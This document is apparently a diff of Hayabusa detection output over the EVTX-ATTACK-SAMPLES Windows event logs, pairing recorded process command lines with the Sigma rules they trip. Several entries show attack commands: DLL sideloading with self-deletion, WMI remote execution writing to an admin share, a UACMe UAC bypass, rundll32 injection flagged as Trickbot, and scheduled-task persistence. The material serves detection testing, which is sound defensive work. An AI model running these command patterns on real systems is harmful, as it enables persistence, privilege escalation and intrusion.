+2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe""  :  Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll""  :  Path: C:\Windows\SysWOW64\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe  :  URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe  :  URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary  :  URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe  :  Path: C:\Windows\SysWOW64\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca  :  Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding  :  Path: C:\Windows\System32\RuntimeBroker.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\Administrator  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd  1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\Administrator  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\Administrator  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell  :  Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64  :  Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe  :  User: DESKTOP-NTSSLJD\den  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe  :  Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe  :  User: DESKTOP-NTSSLJD\den  :  Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell  :  Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: DESKTOP-NTSSLJD\den  :  Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
+2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe  :  Path: C:\Windows\System32\wermgr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32.exe  c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  :  Path: C:\Windows\System32\wbem\WmiPrvSE.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
+2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe  :  URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  :  Path: C:\Windows\System32\wbem\WmiPrvSE.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""  /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers  :  Path: C:\Windows\SysWOW64\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks  /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers  :  Path: C:\Windows\SysWOW64\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe""  /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
